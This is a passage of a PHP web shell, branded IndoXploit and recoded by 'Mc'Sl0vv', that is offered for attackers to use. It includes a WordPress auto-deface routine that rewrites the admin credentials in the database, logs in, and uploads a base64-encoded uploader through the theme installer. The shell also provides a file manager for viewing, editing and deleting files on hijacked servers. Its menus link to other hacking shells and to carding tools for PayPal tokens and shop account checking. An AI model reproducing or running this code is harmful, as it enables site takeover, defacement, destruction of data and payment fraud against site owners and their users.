  3889. if($target == '') {
  3890. echo "[ - ] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3891. } else {
  3892. echo "[ + ] $target <br>";
  3893. }
  3894. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3895. if(!$conn OR !$db OR !$update) {
  3896. echo "[ - ] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3897. mysql_close($conn);
  3898. } else {
  3899. $site = "$target/wp-login.php";
  3900. $site2 = "$target/wp-admin/theme-install.php?upload";
  3901. $b1 = anucurl($site2);
  3902. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3903. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3904. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3905. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3906. $www = "m.php";
  3907. $fp5 = fopen($www,"w");
  3908. fputs($fp5,$upload3);
  3909. $post2 = array(
  3910. "_wpnonce" => "$anu2",
  3911. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3912. "themezip" => "@$www",
  3913. "install-theme-submit" => "Install Now",
  3914. );
  3915. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3916. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3917. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3918. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3919. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3920. curl_setopt($ch, CURLOPT_POST, 1);
  3921. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3922. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3923. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3924. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3925. $data3 = curl_exec($ch);
  3926. curl_close($ch);
  3927. $y = date("Y");
  3928. $m = date("m");
  3929. $namafile = "id.php";
  3930. $fpi = fopen($namafile,"w");
  3931. fputs($fpi,$script);
  3932. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3933. curl_setopt($ch6, CURLOPT_POST, true);
  3934. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3935. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3936. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3937. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3938. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  3939. $postResult = curl_exec($ch6);
  3940. curl_close($ch6);
  3941. $as = "$target/k.php";
  3942. $bs = anucurl($as);
  3943. if(preg_match("#$script#is", $bs)) {
  3944. echo "[ + ] <font color='lime'>berhasil mepes...</font><br>";
  3945. echo "[ + ] <a href='$as' target='_blank'>$as</a><br><br>";
  3946. } else {
  3947. echo "[ - ] <font color='red'>gagal mepes...</font><br>";
  3948. echo "[ - ] coba aja manual: <br>";
  3949. echo "[ + ] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3950. echo "[ + ] username: <font color=lime>$user</font><br>";
  3951. echo "[ + ] password: <font color=lime>$pass</font><br><br>";
  3952. }
  3953. mysql_close($conn);
  3954. }
  3955. }
  3956. } else {
  3957. echo "<center><h1>WordPress Auto Deface V.2</h1>
  3958. <form method='post'>
  3959. Link Config: <br>
  3960. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3961. <input type='text' name='script' height='10' size='50' placeholder='McSl0vv' required><br>
  3962. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3963. </form></center>";
  3964. }
  3965. } elseif($_GET['act'] == 'newfile') {
  3966. if($_POST['new_save_file']) {
  3967. $newfile = htmlspecialchars($_POST['newfile']);
  3968. $fopen = fopen($newfile, "a+");
  3969. if($fopen) {
  3970. $act = "<script>window.location='?act=edit&McSl0vv=".$McSl0vv."&file=".$_POST['newfile']."';</script>";
  3971. } else {
  3972. $act = "<font color=red>Akses Ditolak</font>";
  3973. }
  3974. }
  3975. echo $act;
  3976. echo "<form method='post'>
  3977. Nama File: <input type='text' name='newfile' value='$McSl0vv/newfile.php' style='width: 450px;' height='10'>
  3978. <input type='submit' name='new_save_file' value='Submit'>
  3979. </form>";
  3980. } elseif($_GET['act'] == 'newfolder') {
  3981. if($_POST['new_save_folder']) {
  3982. $new_folder = $McSl0vv.'/'.htmlspecialchars($_POST['newfolder']);
  3983. if(!mkdir($new_folder)) {
  3984. $act = "<font color=red>Akses Ditolak</font>";
  3985. } else {
  3986. $act = "<script>window.location='?McSl0vv=".$McSl0vv."';</script>";
  3987. }
  3988. }
  3989. echo $act;
  3990. echo "<form method='post'>
  3991. Nama Folder: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  3992. <input type='submit' name='new_save_folder' value='Submit'>
  3993. </form>";
  3994. } elseif($_GET['act'] == 'rename_dir') {
  3995. if($_POST['dir_rename']) {
  3996. $McSl0vv_rename = rename($McSl0vv, "".dirname($McSl0vv)."/".htmlspecialchars($_POST['fol_rename'])."");
  3997. if($McSl0vv_rename) {
  3998. $act = "<script>window.location='?McSl0vv=".dirname($McSl0vv)."';</script>";
  3999. } else {
  4000. $act = "<font color=red>Akses Ditolak</font>";
  4001. }
  4002. echo "".$act."<br>";
  4003. }
  4004. echo "<form method='post'>
  4005. <input type='text' value='".basename($McSl0vv)."' name='fol_rename' style='width: 450px;' height='10'>
  4006. <input type='submit' name='dir_rename' value='rename'>
  4007. </form>";
  4008. } elseif($_GET['act'] == 'delete_dir') {
  4009. function Delete($path)
  4010. {
  4011. if (is_dir($path) === true)
  4012. {
  4013. $files = array_diff(scandir($path), array('.', '..'));
  4014. foreach ($files as $file)
  4015. {
  4016. Delete(realpath($path) . '/' . $file);
  4017. }
  4018. return rmdir($path);
  4019. }
  4020. else if (is_file($path) === true)
  4021. {
  4022. return unlink($path);
  4023. }
  4024. return false;
  4025. }
  4026. $delete_dir = Delete($McSl0vv);
  4027. if($delete_dir) {
  4028. $act = "<script>window.location='?McSl0vv=".dirname($McSl0vv)."';</script>";
  4029. } else {
  4030. $act = "<font color=red>could not remove ".basename($McSl0vv)."</font>";
  4031. }
  4032. echo $act;
  4033. } elseif($_GET['act'] == 'view') {
  4034. echo "Nama File: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&McSl0vv=$McSl0vv&file=".$_GET['file']."'><b>Lihat</b></a> ] [ <a href='?act=edit&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Delete</a> ]<br>";
  4035. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4036. } elseif($_GET['act'] == 'edit') {
  4037. if($_POST['save']) {
  4038. $save = file_put_contents($_GET['file'], $_POST['src']);
  4039. if($save) {
  4040. $act = "<font color=lime>TERSAVE!</font>";
  4041. } else {
  4042. $act = "<font color=red>Akses Ditolak</font>";
  4043. }
  4044. echo "".$act."<br>";
  4045. }
  4046. echo "Nama File: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&McSl0vv=$McSl0vv&file=".$_GET['file']."'>lihat</a> ] [ <a href='?act=edit&McSl0vv=$McSl0vv&file=".$_GET['file']."'><b>Edit</b></a> ] [ <a href='?act=rename&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Delete</a> ]<br>";
  4047. echo "<form method='post'>
  4048. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4049. <input type='submit' value='Save' name='save' style='width: 500px;'>
  4050. </form>";
  4051. } elseif($_GET['act'] == 'rename') {
  4052. if($_POST['do_rename']) {
  4053. $rename = rename($_GET['file'], "$McSl0vv/".htmlspecialchars($_POST['rename'])."");
  4054. if($rename) {
  4055. $act = "<script>window.location='?McSl0vv=".$McSl0vv."';</script>";
  4056. } else {
  4057. $act = "<font color=red>Akses Ditolak</font>";
  4058. }
  4059. echo "".$act."<br>";
  4060. }
  4061. echo "Nama File: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Lihat</a> ] [ <a href='?act=edit&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&McSl0vv=$McSl0vv&file=".$_GET['file']."'><b>Rename</b></a> ] [ <a href='?act=download&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&McSl0vv=$McSl0vv&file=".$_GET['file']."'>Delete</a> ]<br>";
  4062. echo "<form method='post'>
  4063. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4064. <input type='submit' name='do_rename' value='rename'>
  4065. </form>";
  4066. } elseif($_GET['act'] == 'delete') {
  4067. $delete = unlink($_GET['file']);
  4068. if($delete) {
  4069. $act = "<script>window.location='?McSl0vv=".$McSl0vv."';</script>";
  4070. } else {
  4071. $act = "<font color=red>Akses Dilarang</font>";
  4072. }
  4073. echo $act;
  4074. }else {
  4075. if(is_dir($McSl0vv) == true) {
  4076. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4077. <tr>
  4078. <th class="th_home"><center>Name</center></th>
  4079. <th class="th_home"><center>Type</center></th>
  4080. <th class="th_home"><center>Size</center></th>
  4081. <th class="th_home"><center>Last Modified</center></th>
  4082. <th class="th_home"><center>Permission</center></th>
  4083. <th class="th_home"><center>Action</center></th>
  4084. </tr>';
  4085. $scandir = scandir($McSl0vv);
  4086. foreach($scandir as $McSl0vvx) {
  4087. $dtype = filetype("$McSl0vv/$McSl0vvx");
  4088. $dtime = date("F d Y g:i:s", filemtime("$McSl0vv/$McSl0vvx"));
  4089. if(!is_dir("$McSl0vv/$McSl0vvx")) continue;
  4090. if($McSl0vvx === '..') {
  4091. $href = "<a href='?McSl0vv=".dirname($McSl0vv)."'>$McSl0vvx</a>";
  4092. } elseif($McSl0vvx === '.') {
  4093. $href = "<a href='?McSl0vv=$McSl0vv'>$McSl0vvx</a>";
  4094. } else {
  4095. $href = "<a href='?McSl0vv=$McSl0vv/$McSl0vvx'>$McSl0vvx</a>";
  4096. }
  4097. if($McSl0vvx === '.' || $McSl0vvx === '..') {
  4098. $act_dir = "<font color=red>[ <a href='?act=newfile&McSl0vv=$McSl0vv'>File Baru</a> ] [<a href='?act=newfolder&McSl0vv=$McSl0vv'>Folder Baru</a> ]</font>";
  4099. } else {
  4100. $act_dir = "<font color=red>[ <a href='?act=rename_dir&McSl0vv=$McSl0vv/$McSl0vvx'>Rename</a> ] [ <a href='?act=delete_dir&McSl0vv=$McSl0vv/$McSl0vvx'>Delete</a> ]</font>";
  4101. }
  4102. echo "<tr>";
  4103. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4104. echo "<td class='td_home'><center>$dtype</center></td>";
  4105. echo "<td class='td_home'><center>-</center></th>";
  4106. echo "<td class='td_home'><center>$dtime</center></td>";
  4107. echo "<td class='td_home'><center>".w("$McSl0vv/$McSl0vvx",perms("$McSl0vv/$McSl0vvx"))."</center></td>";
  4108. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4109. }
  4110. echo "</tr>";
  4111. foreach($scandir as $file) {
  4112. $ftype = filetype("$McSl0vv/$file");
  4113. $ftime = date("F d Y g:i:s", filemtime("$McSl0vv/$file"));
  4114. $size = filesize("$McSl0vv/$file")/1024;
  4115. $size = round($size,3);
  4116. if($size > 1024) {
  4117. $size = round($size/1024,2). 'MB';
  4118. } else {
  4119. $size = $size. 'KB';
  4120. }
  4121. if(!is_file("$McSl0vv/$file")) continue;
  4122. echo "<tr>";
  4123. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&McSl0vv=$McSl0vv&file=$McSl0vv/$file'>$file</a></td>";
  4124. echo "<td class='td_home'><center>$ftype</center></td>";
  4125. echo "<td class='td_home'><center>$size</center></td>";
  4126. echo "<td class='td_home'><center>$ftime</center></td>";
  4127. echo "<td class='td_home'><center>".w("$McSl0vv/$file",perms("$McSl0vv/$file"))."</center></td>";
  4128. echo "<td class='td_home' style='padding-left: 15px;'><font color=red>[ <a href='?act=edit&McSl0vv=$McSl0vv&file=$McSl0vv/$file'>Edit</a> ] [ <a href='?act=rename&McSl0vv=$McSl0vv&file=$McSl0vv/$file'>Rename</a> ] [ <a href='?act=delete&McSl0vv=$McSl0vv&file=$McSl0vv/$file'>Delete</a> ] [ <a href='?act=download&McSl0vv=$McSl0vv&file=$McSl0vv/$file'>Download</a> ]</font></td> ";
  4129. }
  4130. echo "</tr></table>";
  4131. } else {
  4132. echo "<font color=red>Folder Gabisa Dibaca:(</font>";
  4133. }
  4134. }
  4135. echo "<center><hr><form>
  4136. <select onchange='if (this.value) window.open(this.value);'>
  4137. <option selected='selected' value=''> Tools Creator </option>
  4138. <option value='$ling=wso'>WSO 2.8.1</option>
  4139. <option value='$ling=injection'>1n73ction v3</option>
  4140. <option value='$ling=wk'>WHMCS Killer</option>
  4141. <option value='$ling=adminer'>Adminer</option>
  4142. <option value='$ling=b374k'>b374k Shell</option>
  4143. <option value='$ling=b374k323'>b374k 3.2</option>
  4144. <option value='$ling=bh'>BlackHat Shell</option>
  4145. <option value='$ling=dhanus'>Dhanush Shell</option>
  4146. <option value='$ling=r57'>R57 Shell</option>
  4147. <option value='$ling=encodedecode'>Encode Decode</option>
  4148. <option value='$ling=r57'>R57 Shell</option>
  4149. </select>
  4150. <select onchange='if (this.value) window.open(this.value);'>
  4151. <option selected='selected' value=''> Tools Carder </option>
  4152. <option value='$ling=extractor'>DB Email Extractor</option>
  4153. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  4154. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  4155. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  4156. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  4157. <option value='$ling=mailer'>Mailer</option>
  4158. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4159. </select>
  4160. <noscript><input type='submit' value='Submit'></noscript>
  4161. </form>Copyright &copy; ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a> Shell Recoded By <a href='https://defacer.id/archive/attacker/mc-sl0vv' target='_BLANK'><font color=lime>Mc'Sl0vv</a></font></center>";
  4162. ?>
  4163. </html>
Add Comment
Please, Sign In to add comment